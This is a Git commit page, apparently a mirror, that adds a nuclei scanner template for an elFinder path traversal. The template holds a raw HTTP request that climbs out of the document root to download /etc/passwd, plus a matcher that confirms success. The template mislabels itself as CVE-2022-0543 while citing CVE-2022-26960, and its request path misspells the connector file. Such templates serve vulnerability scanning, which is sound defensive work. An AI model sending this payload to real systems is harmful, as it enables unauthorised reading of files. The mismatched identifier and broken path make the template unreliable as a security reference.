daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Create CVE-2022-0543

patch-1
PikPikcU 2022-06-30 19:18:26 -04:00 committed by GitHub
parent 3d20c9bdcb
commit ec5b530025
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 25 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

25
cves/2022/CVE-2022-0543 Normal file
View File

@ -0,0 +1,25 @@
id: CVE-2022-0543
info:
name: elFinder - Path Traversal
author: PIKPIKCU
severity: critical
description: |
Connector.minimal.php in std42 elFinder through 2.1.60 is affected by path traversal. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.
reference:
- https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-26960
tags: cve,cve2022,lfi,elfinder
requests:
- raw:
- |
GET /elfinder/php/connectot.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@base64>&download=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"